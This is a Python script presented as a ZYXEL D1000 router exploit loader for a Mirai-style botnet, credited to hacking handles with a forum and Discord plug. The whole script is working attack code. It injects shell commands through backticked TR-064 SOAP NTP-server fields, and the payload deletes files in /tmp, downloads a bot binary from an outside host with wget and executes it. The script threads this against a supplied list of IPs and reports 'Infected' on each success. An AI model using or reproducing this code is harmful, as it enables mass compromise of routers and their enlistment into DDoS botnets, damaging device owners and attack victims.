ZYXEL D1000 EXPLOIT LOADER [RCE] [MIRAI]

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3. # ZYXEL D1000 Exploit Loader base by DevilsExp & B4ckdoor #
4. # B4CKDOORARCHIVE.CLUB [NEWDOMAIN] | JOIN DISCORD BY WEBSITE INVITE LINK #
5. import requests
6. import threading
7. import time
8. import sys
9.  
10. payload = "cd /tmp && rm -rf * && /bin/busybox wget http://1.1.1.1/Ares.mips && chmod 777 /tmp/tr064 && /tmp/tr064 tr064"
11. #payload = "cd /tmp;wget http://1.1.1.1/Ares.mips;chmod 777 Ares.mips;./Ares.mips d1064" # Ports 5555 80 8080
12.  
13. post_data = "<?xml version=\"1.0\"?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\"><NewNTPServer1>PAYLOAD HERE</NewNTPServer1><NewNTPServer2>`"+payload+"`</NewNTPServer2><NewNTPServer3>`echo AresIotBotnet`</NewNTPServer3><NewNTPServer4>`echo AresIotBotnet`</NewNTPServer4><NewNTPServer5>`echo AresIotBotnet`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
14.  
15. def exploit(target, port):
16.     try:
17.         r = requests.post(
18.             "http://"+target+":"+str(port)+"/UD/act?1",
19.             headers={
20.                 "SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys",
21.                 "content-type": "text/xml"
22.             },
23.  
24.             data = post_data
25.         )
26.         if "D1000" in r.text:
27.                 print "Infected " + target
28.     except Exception as e:
29.         pass
30.  
31. if len(sys.argv) < 2:
32.     exit(sys.argv[0]+" [LIST] [PORT]")
33. else:
34.     ips = open(sys.argv[1], "r").readlines()
35.     port = int(sys.argv[2])
36.     for ip in ips:
37.         #print ip.strip()
38.         threading.Thread(target=exploit, args=(ip.strip(), port)).start()
39.         time.sleep(0.02)